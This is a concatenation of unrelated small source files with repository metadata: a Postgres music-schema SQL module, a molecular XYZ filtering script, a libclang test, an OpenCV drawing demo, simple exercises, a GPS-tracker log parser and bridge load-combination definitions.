print (" \t-h,\t\thelp")
def main(argv):
argCfg = ""
argDBConn = ""
optBatch = False
try:
opts, args = getopt.getopt(argv,"hbc:d:",["batch","config=","database="])
except getopt.GetoptError:
print_usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print_usage()
sys.exit()
elif opt in ("-c", "--config"):
argCfg = arg
elif opt in ("-d", "--database"):
argDBConn = arg
elif opt in ("-b", "--batch"):
optBatch = True
if len(argDBConn) == 0 or len(argCfg) == 0:
print_usage()
sys.exit(0)
if not os.path.exists(argCfg):
fatal("File %s not found" % (argCfg))
record_quotes(argCfg, argDBConn, optBatch)
if __name__ == '__main__':
main(sys.argv[1:]) | [
"allenliu@htsc.com"
] | allenliu@htsc.com |
142149509d7a5bb8e78ae7e37ec76a01b767a1bf | bfb1ebb52db5018f328e4b33003073d547b777d0 | /sql_queries.py | 347cd9e0aa01f2f81321b9bc2fb323d0ecc42817 | [] | no_license | mrpythonita/Data-Modelling-with-Postgres | 96ab888bfdca8a0879187d01bf8145993ccef117 | e4c562fd7239141a01aeefdd1eed9792efc58c74 | refs/heads/main | 2023-02-23T11:51:11.128289 | 2021-01-26T21:01:25 | 2021-01-26T21:01:25 | 333,214,021 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,808 | py | # DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays(
songplay_id serial PRIMARY KEY
,start_time timestamp NOT NULL
,user_id varchar(50) NOT NULL
,level varchar(100)
,song_id varchar(50)
,artist_id varchar(50)
,session_id int
,location varchar
,user_agent varchar
)
""")
user_table_create = ("""
CREATE TABLE users(
user_id varchar(50) PRIMARY KEY
,first_name varchar(50)
,last_name varchar(50)
,gender varchar(10)
,level varchar(50)
)
""")
song_table_create = ("""
CREATE TABLE songs(
song_id varchar PRIMARY KEY
,title varchar
,artist_id varchar
,year int
,duration float
)
""")
artist_table_create = ("""
CREATE TABLE artists(
artist_id varchar PRIMARY KEY
,artist_name varchar
,artist_location varchar
,artist_latitude float
,artist_longitude float
)
""")
time_table_create = ("""
CREATE TABLE time(
start_time timestamp PRIMARY KEY
,hour int
,day int
,week int
,month int
,year int
,weekday int
)
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays(
start_time
,user_id
,level
,song_id
,artist_id
,session_id
,location
,user_agent
)
VALUES (%s,%s,%s,%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
user_table_insert = ("""
INSERT INTO users(
user_id
,first_name
,last_name
,gender
,level
)
VALUES(%s,%s,%s,%s,%s)
on conflict(user_id) DO UPDATE SET level= excluded.level
""")
song_table_insert = ("""
INSERT INTO songs(
song_id
,title
,artist_id
,year
,duration
)
VALUES(%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
artist_table_insert = ("""
INSERT INTO artists(
artist_id
,artist_name
,artist_location
,artist_latitude
,artist_longitude
)
VALUES(%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
time_table_insert = ("""
INSERT INTO time(
start_time
,hour
,day
,week
,month
,year
,weekday
)
VALUES(%s,%s,%s,%s,%s,%s,%s)
ON CONFLICT DO NOTHING
""")
# FIND SONGS
song_select = ("""
SELECT s.song_id
,s.artist_id
FROM songs s
JOIN artists a
ON s.artist_id = a.artist_id
WHERE s.title = %s
AND a.artist_name = %s
AND s.duration = %s
""")
# QUERY LISTS
create_table_queries = [songplay_table_create, user_table_create, song_table_create, artist_table_create, time_table_create]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop] | [
"noreply@github.com"
] | mrpythonita.noreply@github.com |
fe75ca185adaf37639a4e3782095a41d9b93f1ab | f5eba932cba302389943cc1beed77352ce484b73 | /isolate_by_range/isolate_atoms_by_z_range_atom_numbers.py | c9e30d883f995fbdd0cf3738b5637c056cf575db | [] | no_license | mikexstudios/wagcode | 06c74332e8cad42e6b04bac121fd86f7d75a9e2d | 3e925052f17a9c9cf256d3e1ab985265d39e13ff | refs/heads/master | 2020-12-24T15:41:07.849300 | 2009-07-22T10:24:23 | 2009-07-22T10:24:23 | 246,507 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | #!/usr/bin/env python
'''
isolate_atoms_by_z_range_atom_numbers.py
------------------------
Given an XYZ file and a z range, isolates those atoms.
This version adds the output of atom numbers. Used these numbers
to get charges from fort.56 file.
'''
__author__ = 'Michael Huynh (mikeh@caltech.edu)'
__website__ = 'http://www.mikexstudios.com'
__copyright__ = 'General Public License (GPL)'
#import sys
#import re
#import math
from XYZ import *
#Parameters
structure_file = 'test.xyz'
output_file = 'test_atom_numbers.txt'
surface_z_min = 31.0 #Defines the starting z coordinates for the surface
surface_z_max = 33.0 #Defiles the ending z coordinates for the surface
def get_atom_numbers_by_z_range(xyz_rows, z_min, z_max):
#Format of XYZ file is:
# [atom] [x] [y] [z]
atom_numbers = []
for row_i, row in enumerate(xyz_rows):
if row[3] >= z_min and row[3] <= z_max:
atom_numbers.append(row_i+1) #+1 correction since atom # starts at 1
return atom_numbers
def main():
structure = XYZ()
structure.load(structure_file)
atom_numbers = get_atom_numbers_by_z_range(
structure.rows, surface_z_min, surface_z_max
)
f = file(output_file, 'w')
for atom_number in atom_numbers:
f.write(str(atom_number)+"\n")
f.close()
if __name__ == '__main__':
main()
| [
"mike.huynh@gmail.com"
] | mike.huynh@gmail.com |
b246bc922d4bf8d4371629aadf578c161d4a5220 | b5a214062f140389527479802d98d414d8e41dc6 | /bindings/python/tests/cindex/test_comment.py | d8f3129ac51e7f5643327d177424ac5d821fbf7c | [
"NCSA"
] | permissive | Codeon-GmbH/mulle-clang | f050d6d8fb64689a1e4b039c4a6513823de9b430 | 2f6104867287dececb46e8d93dd9246aad47c282 | refs/heads/master | 2021-07-18T07:45:29.083064 | 2016-11-01T13:16:44 | 2016-11-01T13:16:44 | 72,544,381 | 29 | 5 | Apache-2.0 | 2020-04-30T11:36:08 | 2016-11-01T14:32:02 | C++ | UTF-8 | Python | false | false | 957 | py | from clang.cindex import TranslationUnit
from tests.cindex.util import get_cursor
def test_comment():
files = [('fake.c', """
/// Aaa.
int test1;
/// Bbb.
/// x
void test2(void);
void f() {
}
""")]
# make a comment-aware TU
tu = TranslationUnit.from_source('fake.c', ['-std=c99'], unsaved_files=files,
options=TranslationUnit.PARSE_INCLUDE_BRIEF_COMMENTS_IN_CODE_COMPLETION)
test1 = get_cursor(tu, 'test1')
assert test1 is not None, "Could not find test1."
assert test1.type.is_pod()
raw = test1.raw_comment
brief = test1.brief_comment
assert raw == """/// Aaa."""
assert brief == """Aaa."""
test2 = get_cursor(tu, 'test2')
raw = test2.raw_comment
brief = test2.brief_comment
assert raw == """/// Bbb.\n/// x"""
assert brief == """Bbb. x"""
f = get_cursor(tu, 'f')
raw = f.raw_comment
brief = f.brief_comment
assert raw is None
assert brief is None
| [
"akyrtzi@gmail.com"
] | akyrtzi@gmail.com |
ee135d519ec0726e6868d0dedee7b7549765574d | 95e475d1d8141c0ed59225d9dbb08f066e018545 | /OpenCV/DrawingShapes.py | 488edecafaec533fe61892f7bd1be144815ee0ea | [] | no_license | kk13332488/Deep-Learning | 296a81888a17e6b7ffe96d72e965a04d17c70967 | c72d6453483dba0bdd591a499e6009dcd3f81139 | refs/heads/main | 2023-05-31T10:48:08.663865 | 2021-07-02T05:17:33 | 2021-07-02T05:17:33 | 362,121,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import numpy as np
import cv2
def drawing():
img = np.zeros((512,512,3), np.uint8) #Generating Space
cv2.line(img, (0,0), (511,511), (255, 0, 0), 4) #img, pt1, pt2, color, thickness
cv2.rectangle(img, (384, 0), (510, 128), (0, 255, 0), 3)#img, vertex1, vertex2, color, thickness
cv2.circle(img, (447, 63), 63, (0, 0, 255), -1) #img, center of circle, radius, color, fill in the inner circle with given color
cv2.ellipse(img, (256,256), (100, 50), 0, 0, 180, (255, 0, 0), -1) #img, Center Coordinates, size, Angle, startAngle, endAngle, color
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'openCV', (10, 500), font, 4, (255,255,255), 2)#img, text, point, fontFace, fontScale, color, thickness
cv2.imshow('drawing', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
drawing()
| [
"kk13332488@gmail.com"
] | kk13332488@gmail.com |
afe6fbf10498b11d0c161994d33a51a850a6036e | 1fa3016c1b67178910b477fd5885cc0fff17e923 | /Learning Python/2D Array.py | 000cb06dc25ee81a85c884fc6a4a04e61e55c5d2 | [] | no_license | Charnub/python-code | 9f1c952075ed725b8561a2115acb30872ba0b797 | 3e35510756e8635e26fc3b71396a0c8856385b69 | refs/heads/master | 2021-04-15T09:26:34.691921 | 2018-03-22T18:09:51 | 2018-03-22T18:09:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | import random
aScores = [["Jane", 0], ["Bob", 10], ["Ben", 14]]
for i in range (0,1):
for j in range (0,2):
print(aScores[i][j])
| [
"noreply@github.com"
] | Charnub.noreply@github.com |
75bbbe754d344cb243580cb495baebe07914d27a | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/alhada001/question1.py | a7d1ab9e4c2362dd2297a16531f5457babdf6f3d | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | #Adam Alhadeff
import math
file = input("Enter the marks filename:\n")
f = open(file, "r")
length = len(open(file).readlines())
names = []
marks = []
line = f.readline()
count = 0
for i in range(length):
split = line.split(",")
names.append(split[0])
marks.append(split[1])
count += 1
line = f.readline()
total = 0
for i in range(len(marks)):
total = total + int(marks[i])
average = total/count
SDT = 0
for i in range(len(marks)):
SDT = SDT + (int(marks[i])-average)*(int(marks[i])-average)
SD = math.sqrt(SDT/count)
print("The average is:","%0.2f" % (average))
print("The std deviation is:","%0.2f" % (SD))
NumStudents = 0
for i in range(len(marks)):
if int(marks[i]) < (average-SD):
NumStudents += 1
if NumStudents != 0:
print("List of students who need to see an advisor:")
for i in range(len(marks)):
if int(marks[i]) < (average-SD):
print(names[i]) | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
3cfe9f806a69dac658f48ef9028306aaaa9e5724 | 67954b4bfce1395d571bf4f298f71f04167156c1 | /manoeuvre/test.py | b13e08e0e60992264b88f9768c38a900d28ede85 | [] | no_license | seym45/erc2018 | 90cf4257a541c701940f9985f3fd1e2df326b988 | 0ab9cc3132597d626c2cea999ca65e19510c054e | refs/heads/master | 2020-03-26T22:06:55.342243 | 2018-09-08T19:17:53 | 2018-09-08T19:17:53 | 145,432,610 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,524 | py | a = 'imei:864893030415379,tracker,180819162419,,F,102419.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162429,,F,102429.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162439,,F,102439.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162449,,F,102449.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162359,,F,102359.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819162459,,F,102459.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162409,,F,1\
02409.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162509,,F,102509.00,A,2348.89374,N,09024\
.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162519,,F,102519.00,A,2348.89374,N,09024.74758,E,,,,0\
,0,0.00%,,;imei:864893030415379,tracker,180819162529,,L,,,36,,a7c7,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162539,,F,\
102539.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,180819162541,,F,102541.00,A,2348.89374,N,0902\
4.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162549,,F,102549.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819162559,,F,102559.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,1808\
19162609,,F,102609.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162719,,F,102719.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,\
180819162723,,F,102723.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162729,,F,102729.00,A,2\
348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162739,,F,102739.00,A,2348.89374,N,09024.74758,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819162749,,F,102749.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819162759,,F,102759.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162809,,L,,\
,36,,a7c7,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819162819,,F,102819.00,A,2348.89374,N,09024.74758,E,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819162829,,F,102829.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819162839,,F,102839.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162849,,F,\
102849.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162859,,F,102859.00,A,2348.89374,N,0902\
4.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819162909,,F,102909.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;8648\
93030415379;imei:864893030415379,tracker,180819162919,,F,102919.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163019,,F,103019.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,help me,\
180819163023,,F,103023.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163029,,F,103029.00,A,2\
348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163039,,F,103039.00,A,2348.89374,N,09024.74758,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819163049,,F,103049.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163059,,F,103059.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163109,,F,1\
03109.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163119,,L,,,36,,a7c7,,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163129,,F,103129.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819163139,,F,103139.00,A,2348.89374,N,09024.74758,E,,,,0,0,0.00%,,;imei:864893030415379,sensor alarm,18081916314\
1,,L,,,36,,a7c7,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163146,,F,103146.00,A,2348.89190,N,09024.76118,E,0.392,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163156,,F,103156.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163206,,F,1\
03206.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163216,,F,103216.00,A,2348.89382,N\
,09024.76007,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163226,,F,103226.00,A,2348.89382,N,09024.\
76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163237,,F,103236.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.\
00%,,;imei:864893030415379,tracker,180819163247,,F,103247.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163257,,F,103257.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163307,,F,103307.00,A,2348.89382,N,09024.76007,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163317,,L,,,36,,a7c8,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163327,,F,103327.00,A,2348.9\
0570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163337,,F,103337.00,A,2348.90570,N,09024.75611,E,0.\
000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163347,,F,103347.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819163357,,F,103357.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163407,,F,103407.00,A,2348.90570,N,09024.75611,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163527,,F,103527.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819163537,,F,103537.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163547,,F,1\
03547.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163557,,F,103557.00,A,2348.88676,N\
,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819163607,,F,103607.00,A,2348.88676,N,09024.76308,E,0.000,0,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163617,,F,103617.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;8648930304\
15379;imei:864893030415379,tracker,180819163627,,F,103627.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163637,,F,103637.00,A,2348.88676,N,09024.76308,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,18081916364\
7,,F,103647.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163657,,F,103657.00,A,2348.88676,N\
,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163707,,F,103707.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,\
;imei:864893030415379,tracker,180819163717,,F,103717.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:86489303\
0415379,tracker,180819163727,,F,103727.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163737,\
,F,103737.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163747,,F,103747.00,A,2348.88676,N,0\
9024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163757,,F,103757.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;i\
mei:864893030415379,tracker,180819263807,,F,103807.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,1\
80819163817,,F,103817.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819163827,,F,103827.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,\
180819163837,,F,103837.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163847,,F,103847.00,A,2\
348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163857,,F,103857.00,A,2348.88676,N,09024.76308,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819163907,,F,103907.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819163917,,L,,,36,,a7c8,,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819163927,,F,103927.00,A,\
2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819163937,,F,103937.00,A,2348.88676,N,09024.76308,E,,,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819163947,,F,103947.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819163957,,F,103957.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164007,,F,\
104007.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164127,,F,104127.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,\
180819164137,,F,104137.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164147,,F,104147.00,A,2\
348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164157,,F,104157.00,A,2348.88676,N,09024.76308,E,,,,\
0,0,0.00%,,;imei:864893030415379,tracker,180819164207,,F,104207.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819164217,,F,104217.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,1\
80819164227,,F,104227.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164237,,F,104237.00,A,23\
48.88676,N,09024.76308,E,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164247,,F,104247.00,A,2348.88676,N,09024.76308,E,,,,0\
,0,0.00%,,;imei:864893030415379,tracker,180819164257,,F,104257.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164307,,F,104307.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164317,,F,104317.00,A,2348.88676,N,09024.76308,E,,,,0,0,0.00%,,;864893030415379;imei:86489303\
0415379,tracker,180819164327,,F,104327.00,A,2348.89149,N,09024.75008,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,1808191\
64337,,F,104337.00,A,2348.88951,N,09024.74852,E,5.064,199.45,,0,0,0.00%,,;imei:864893030415379,tracker,180819164336,,F,104336.00\
,A,2348.89119,N,09024.74960,E,4.673,198.15,,0,0,0.00%,,;imei:864893030415379,tracker,180819164347,,L,,,36,,a7c8,,,,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164357,,F,104357.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164407,,F,104407.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164417,,F,1\
04417.00,A,2348.88053,N,09024.75140,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164427,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164437,,F,104437.00,A\
,2348.89528,N,09024.75105,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164447,,F,104447.00,A,2348.89528,N,09024.751\
05,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164457,,F,104457.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%\
,,;imei:864893030415379,tracker,180819164507,,F,104507.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;imei:864893030415379\
,tracker,180819164517,,F,104517.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracke\
r,180819164527,,F,104527.00,A,2348.90971,N,09024.75253,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164537,,F,10453\
7.00,A,2348.91431,N,09024.76629,E,5.190,41.55,,0,0,0.00%,,;imei:864893030415379,tracker,180819164536,,F,104536.00,A,2348.91198,N\
,09024.76207,E,3.211,42.79,,0,0,0.00%,,;imei:864893030415379,tracker,180819164547,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:86489303041\
5379,tracker,180819164557,,F,104557.00,A,2348.90580,N,09024.76485,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164607,,L,,,36,,a7c8,,,,,0,0,0.00%,,;imei:864893030415379,tracker,180819164617,,F,104617.00,A\
,2348.89249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,180819164627,,F,104627.00,A,2348.8\
9249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164637,,F,104637.00,A,2348.89249,N,09024.76605,E,0.\
000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164647,,F,104647.00,A,2348.89249,N,09024.76605,E,0.000,0,,0,0,0.00%,,;imei\
:864893030415379,tracker,180819164657,,F,104657.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracke\
r,180819164707,,F,104707.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,help me,180819164707,,F,10470\
7.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164717,,F,104717.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164727,,F,104727.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164737,,F,104737.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164747,,F,1\
04747.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164757,,F,104757.00,A,2348.89632,N\
,09024.76918,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164807,,F,104807.00,A,2348.89632,N,09024.76918,E,0.000,0,\
,0,0,0.00%,,;imei:864893030415379,tracker,180819164817,,F,104817.00,A,2348.89632,N,09024.76918,E,0.000,0,,0,0,0.00%,,;8648930304\
15379;imei:864893030415379,tracker,180819164827,,F,104827.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415\
379,tracker,180819164837,,F,104837.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,sensor alarm,180819\
164842,,F,104842.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164847,,F,104847.00,A,2\
348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164857,,F,104857.00,A,2348.89831,N,09024.74917\
,E,0.000,0,,0,0,0.00%,,;\
imei:864893030415379,tracker,180819164907,,F,104907.00,A,2348.89831,N,09024.74917,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tr\
acker,180819164917,,F,104917.00,A,2348.88471,N,09024.75093,E,0.000,0,,0,0,0.00%,,;864893030415379;imei:864893030415379,tracker,1\
80819164927,,F,104927.00,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164937,,F,104937.0\
0,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164947,,F,104947.00,A,2348.89027,N,09024.\
75543,E,0.000,0,,0,0,0.00%,,;imei:864893030415379,tracker,180819164957,,F,104957.00,A,2348.89027,N,09024.75543,E,0.000,0,,0,0,0.\
00%,,;\
'
a= a.split(';')
for line in a:
print(line) | [
"seym45@gmail.com"
] | seym45@gmail.com |
48cf3ed92a3e10d96e85fb1b15ba0340b11f90da | 9dba8607dce414f9905700d7a4ac44668de5e1f1 | /puente_quintanavides/combinaciones/def_hip_elscp_resumidas_xci.py | da24fbbb055eb1ffb3374131c83a39767b1d825f | [] | no_license | anaiortega/XCmodels | c0463ffe38531578aee281456e88528882255cd7 | e9b8c2f996a21b8aa3314242f3cc12b0e391b5df | refs/heads/master | 2023-08-16T22:44:01.168775 | 2023-08-14T18:15:10 | 2023-08-14T18:15:10 | 141,140,177 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,362 | py | \combinacion["ELSCP001"]{ descomp("1.00*G1 + 0.70*TC1V1")}
\combinacion["ELSCP002"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.20*NV")}
\combinacion["ELSCP009"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2")}
\combinacion["ELSCP010"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC3V2 + 0.20*NV")}
\combinacion["ELSCP021"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2")}
\combinacion["ELSCP022"]{ descomp("1.00*G1 + 0.70*TC1V1 + 0.70*TC2V2 + 0.20*NV")}
